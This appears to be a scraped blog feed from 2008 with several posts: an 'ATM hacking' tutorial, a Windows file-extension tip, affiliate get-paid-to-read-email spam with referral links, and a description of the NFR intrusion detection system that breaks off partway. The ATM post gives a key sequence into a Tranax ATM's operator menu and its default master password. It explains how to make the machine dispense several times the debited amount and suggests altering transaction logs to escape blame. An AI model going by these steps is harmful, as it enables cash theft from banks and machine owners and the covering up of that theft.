style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;How is it done?? 
This time I will write a short, informative tutorial and article on the possibility of hacking the ATM machine itself .. There are actually many ways, and most of them can be seen at &lt;/span&gt;&lt;u&gt;&lt;span style=";font-family:Verdana;font-size:10;color:blue;"   &gt;http://www.sate.name&lt;/span&gt;&lt;/u&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt; .. But this time I will discuss a little of the technical side xD~~&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;So .. Let's start the GAME xD~~&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;This only works on machines of the Tranax Minibank 1500 Series type ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;If you look closely .. you can get an important piece of information from the series I named above xD~~&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Here is an excerpt from the manual I read:&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;To access the Operator Function menu, hold the &amp;lt;cancel&amp;gt;, &amp;lt;clear&amp;gt; and &amp;lt;enter&amp;gt; keys simultaneously for 2 seconds, release them and press 1, then press 2, then press 3. 
The timing of this procedure can be difficult at first.&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;So in short, to enter the Operator Function on this type of ATM machine, you need to press the &amp;lt;cancel&amp;gt;, &amp;lt;clear&amp;gt; and &amp;lt;enter&amp;gt; keys together for 2 seconds, release them, and press 1, then 2, and 3. The timing may be difficult the first time you try .. xD~~&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;If you have trouble logging in ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;There is also a crude way .. Wakakaka ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Turn off the ATM's power, open the ATM cover, remove the printer paper, put it back, and when you power the ATM on again it will go straight into the Operator Function ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;It is hard, admittedly ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;But no pain .. No gain right?? xD~~&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;After entering the Operator Function .. 
you will be prompted with 3 types of password, and you can choose 1 of the 3:&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;- Operator Password (This gives access to the ATM's basic menu structure)&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;- Service Password (Allows access to the basic menu and the diagnostic menu)&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;- Master Password (Gives you full access to the machine)&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;This is the key point of our discussion ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;On Tranax MiniBank 1500 Series machines .. the default Master Password is "000000" (without the quotes) .. And I suspect not many have changed that default password, Hehehe ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;From there you can do many things ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Among them is "reset the status of the cash cartridges" .. which means you might withdraw 100 thousand yet receive 400 thousand, because you set the dispensing to 4 times as much .. while the bank deducts only the 100 thousand you requested .. 
Hehehehe ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Interesting, isn't it??!&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Wakakaka ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;As for .. what if we get traced??&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;With the Master Password you can change the transaction time, change the ATM's entire timing and printing data, and so on .. Well, get creative yourself to escape accusation .. So in short, what you need to fear is .. security cameras&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;NB: This tutorial was written only for learning and to demonstrate that ATM hacking can happen. For that reason we do not go into further detail. The following is also evidence that this security "hole" is being patched by Tranax: Read here!!! .. 
That's all&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-5149780704297944142?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/5149780704297944142/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=5149780704297944142' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5149780704297944142'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5149780704297944142'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/atn-hacking.html' title='ATM hacking'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-2171888705552419405</id><published>2008-03-26T19:26:00.000-07:00</published><updated>2008-03-26T19:36:19.716-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Displaying file extensions</title><content type='html'>A file extension can be described as an identifier of the file type. For example, .doc for MS Word files, .cdr for Corel Draw, and so on (see also here). By default these file extensions are not shown. However, you can display them so that you can better understand the file extensions on your Windows system. 
The steps are as follows:&lt;br /&gt;&lt;br /&gt;  1. In Windows Explorer, click the View menu and choose Folder Options.&lt;br /&gt;  2. Clear the check mark (tick) next to Hide file extensions for known file types to display file extensions.&lt;br /&gt;  3. Conversely, set the check mark to hide file extensions and show them only for files whose type is unknown.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-2171888705552419405?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/2171888705552419405/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=2171888705552419405' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2171888705552419405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2171888705552419405'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/menampilkan-ekstensi-file.html' title='Menampilkan ekstensi file'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-824154183289038411</id><published>2008-03-26T04:15:00.000-07:00</published><updated>2008-03-27T04:16:14.576-07:00</updated><title type='text'></title><content type='html'>&lt;p&gt;&lt;a href="http://tinyurl.com/2fcjuh"&gt;&lt;img 
src="http://tinyurl.com/2cc37w" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://tinyurl.com/2fcjuh"&gt;&lt;img src="http://tinyurl.com/298w5c" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://technorati.com/claim/bmu2iyhak6" rel="me"&gt;Technorati Profile&lt;/a&gt;&lt;/p&gt;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://enaq.blogspot.com"&gt;&lt;img src="http://static.technorati.com/pix/fave/btn-fave2.png" alt="Add to Technorati Favorites" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-824154183289038411?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/824154183289038411/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=824154183289038411' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/824154183289038411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/824154183289038411'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/blog-post.html' title=''/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8088323346315680553</id><published>2008-03-26T03:35:00.000-07:00</published><updated>2008-03-26T03:50:51.752-07:00</updated><title 
type='text'>www.blogdigger.com</title><content type='html'>&lt;a href="http://www.blogdigger.com/" alt="Blogdigger Blog Search Engine"&gt;&lt;img src="http://www.blogdigger.com/images/blogdigger2.gif" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-8088323346315680553?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8088323346315680553/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8088323346315680553' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8088323346315680553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8088323346315680553'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/wwwblogdiggercom_26.html' title='www.blogdigger.com'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7853105819161575084</id><published>2008-03-26T03:18:00.000-07:00</published><updated>2008-03-26T05:02:36.142-07:00</updated><title type='text'></title><content type='html'>&lt;a href="http://enaq.blogspot.com/googlece1b1e8a28ebeb4e.html"&gt;Google&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 
src='https://blogger.googleusercontent.com/tracker/8591117055296439835-7853105819161575084?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7853105819161575084/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7853105819161575084' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7853105819161575084'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7853105819161575084'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/google.html' title=''/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-6437145206992561494</id><published>2008-03-26T00:51:00.001-07:00</published><updated>2008-03-31T20:18:02.785-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Money maker'/><title type='text'></title><content type='html'>&lt;h3 class="post-title entry-title"  style="font-weight: normal; text-align: justify;font-family:georgia;"&gt;Looking for MONEY without CAPITAL??? Many people put off going into business while they wait to accumulate capital. What about you, are you like most people??? Do you want to run a business without capital, OR earn money without capital??? Many people doubt that it is possible. But for you, a netter, it will become reality. Please PROVE it by joining the programs below.&lt;br /&gt;&lt;br /&gt;Make 
money from online business: earn profit from affiliate programs&lt;br /&gt;&lt;br /&gt;There is no doubt that the most successful group amongst online entrepreneurs are affiliates. Few are willing to go public about it but it is widely known that there are a number of affiliates comfortably raking in hundreds of thousands of dollars in income every year. Actually there is one very powerful advantage that online entrepreneurs involved in affiliate programs have over their counterparts earning from their own ecommerce web sites. And that is the fact that people are usually bound to believe a person referring another web site to them much more easily and quickly than one trying to promote their own site. This coupled with the fact that the Internet is an amazingly powerful referral marketing tool has made the rise of online affiliates phenomenal within such a short time. But there is one major stumbling block that affiliates face today. And that is how to advertise their programs or how to generate enough sales leads. To be successful in any online venture a person needs numerous leads on an ongoing basis; that way they will have a chance of turning as many of them as possible into actual sales. Many affiliates generate leads by finding ways of harvesting email addresses of visitors to their web sites to create an opt-in email list which they then use as leads to refer to their affiliate sites. This is usually done via special links to the sites that identify the particular affiliate through which a visitor arrived at a certain site. The more prosperous affiliates use pay-per-click ads. The effectiveness of these ads is being eroded daily by the increasing number of fraudsters and scam artists who have invaded pay-per-click ads in droves. 
This has meant that out of the total click-throughs a person receives and has to pay for, an increasingly horrifying percentage are generated by fraudsters who have no intention of buying anything from the advertised web site.&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;  &lt;p&gt;&lt;a href="http://www.getpaidmail.com/pages/index.php?refid=pirates"&gt;&lt;img alt="getpaidmail.com" src="http://www.getpaidmail.com/images/banner5.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.no-minimum.com/pages/index.php?refid=darmatkj"&gt;&lt;img alt="no-minimum.com" src="http://www.no-minimum.com/banners/nomin2.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.sendmoreinfo.com/Id/3105647"&gt;&lt;img src="http://www.sendmoreinfo.com/members/Banner01.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;&lt;h3 class="post-title entry-title"  style="font-weight: normal; text-align: justify;font-family:georgia;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;There are many ways to earn dollars from the internet, from reading email, surfing and playing games to chatting. It sounds implausible, but that is the reality. The question is, where do they get the money to pay us? The answer is simple. They get the money from companies that place ads on their web site or view bar.&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;To satisfy your curiosity, you can try some of the sites or programs below, which are believed to pay their members. In addition, once (you have registered and) your money has reached a certain amount, they will send a &lt;em&gt;bank draft check&lt;/em&gt; that you can cash at many banks in Indonesia. 
Below are some links that have been proven to pay:&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;  &lt;p&gt;&lt;a href="http://www.getpaidmail.com/pages/index.php?refid=pirates"&gt;&lt;img alt="getpaidmail.com" src="http://www.getpaidmail.com/images/banner5.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.no-minimum.com/pages/index.php?refid=darmatkj"&gt;&lt;img alt="no-minimum.com" src="http://www.no-minimum.com/banners/nomin2.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.sendmoreinfo.com/Id/3105647"&gt;&lt;img src="http://www.sendmoreinfo.com/members/Banner01.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://www.sendmoreinfo.com/Id/3105647"&gt;Earn Some money here&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-6437145206992561494?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/6437145206992561494/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=6437145206992561494' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6437145206992561494'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6437145206992561494'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/look-for-money-without-capitalmany.html' title=''/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' 
src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-2347529749217098407</id><published>2008-03-25T12:05:00.000-07:00</published><updated>2008-03-25T12:07:07.033-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Network Flight Recorder – A New Tool for the War</title><content type='html'>&lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR (Network Flight Recorder available at &lt;a href="http://www.nfr.net/"&gt;http://www.nfr.net&lt;/a&gt;) is an IDS (Intrusion Detection System) that gives the users a powerful tool for the war against illegal access to your network. With the flexibility of this tool, network managers can feel a little better about who is accessing their network and where their employees are going.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;How Does NFR Work? Features of NFR&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The NFR Intrusion Detection Appliance (IDA) is a flexible, extensible, general-purpose tool that addresses both security and network management. NFR uses N-Code that was released to allow the users the flexibility to configure the IDA for their configuration. NFR is a programmable traffic analysis/intrusion detection engine that can be instantly updated when a new attack is discovered. Most IDS like ISS RealSecure or Axent’s Intruder Alert/NetProwler require that the vendor send out either an executable from ISS or a signature from Axent. With NFR a user can write their own request order and install it. NFR gives the users a chance to customize the IDA to their needs. 
&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The architecture of NFR was designed as a set of components, each tailored to a specific activity. Data is gathered by one or more packet suckers, forwarded to the decision engine for filtering and reassembly, and possibly recorded to a backend for storage or statistical processing. The query interface is kept completely separate from the input data flow to minimize the performance impact of a user querying the system while it is collecting data.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The N programming language is a derivation of an interpreted language designed years ago for use in a computer game. The interpreter operates on a byte-code instruction set that implements a simple stack machine. One advantage of this approach is that NFR filters occupy very little memory, yet are quite fast to evaluate. N is a complete programming language including flow control, procedures, variables with scoping rules, and list data types. Unlike many programming languages, however, N has primary data types such as "IP address." Since NFRs may be used on large networks, we chose to implement counter data types as 64-bit integers, to reduce the chance of overflow.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Configurations:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR can be configured in both distributed and stand-alone configurations. In the stand-alone configuration, a single NFR station gathers and stores information. The distributed configuration places multiple remote stations on the network, and each rolls its data to a central station. You manage, query, and view alerts through the central station, and as your network grows, you add a new remote for that segment. You can manage your IDA from any Windows machine on your network. 
Change system settings, run queries, or view and receive alerts from the location that is convenient for you. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;How Can You Monitor Your System? &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR has alerts that can be configured to pop up on the NFR Console. The alerts, which require immediate attention, pop up and make a beep on the console. The alerts are sent to the NFR console and the NFR IDA Recorder. If you are not running the console, you can use the alert viewer to view the alerts at a later time. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Triggers within N-code occur upon receipt or detection of an event that the code is attached to. Events can be triggered with limitations on source, destination, ports, client or server side (if known), or patterns within the TCP stream. The syntax looks like:&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;filter mailtrack tcp (client, dport: 25 ) { &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The filter above is a simple TCP stream trigger that will monitor the client side of SMTP connections. 
The "client" and "server" notion is based on the reassembly engine's recollection of which system initiated the connection that is being observed.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Keywords that can be placed within an event are:&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;client - from the caller &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;server - from the called &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;start: "string" - begin matching &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;stop: "string" - end matching &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;opensession - on start of connection &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;closesession - on end of connection &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;port - IP port number (source or dest) &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;sport - source port &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;dport - destination port &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;host - source or destination address &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;net - source or destination network &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;dst - destination address &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;src - source address &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;A typical use is to configure an event to call N 
code for as small a subset of received data as is practical, then implement any further filtering in N code. To detect spam, for example, you might select TCP traffic for port 25/SMTP.&lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Components:&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR uses an IDA engine to sniff packets from one or more interfaces on the NFR IDA. Unlike a firewall, the NFR IDA engine does not actually touch the packets. It only observes them so that they can be recorded. Events tell the NFR IDA engine to take some sort of action. An event can be a command and control message, the passage of time, or the arrival of a packet. Backends are one of the components of the IDA. Within Backends, you will have Filters, which list the events that cause the NFR IDA engine to begin gathering data. Configuration Files provide information about the title of the backend and other information displayed via the NFR console. Recorders write the information gathered by the backends to files. List Recorders collect, record, and maintain a log of activity. Histogram Recorders collect statistical information in many dimensions, rather than the one dimension typically used when gathering statistics. Packages group related types of Backends together. Shared N-Code filters perform some of the processing for the backends in the package. 
Configuration files provide information about the title of the package and other information displayed via the NFR console.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;"Centralized firewall" problems&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;DISCLAIMER: This document contains untested ideas, please verify or debunk &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;me. Perhaps this is already old information? In any case, I would&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;like some (constructive) feedback.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Introduction&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Many Internet Service Providers (ISPs) provide so-called "centralized &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span 
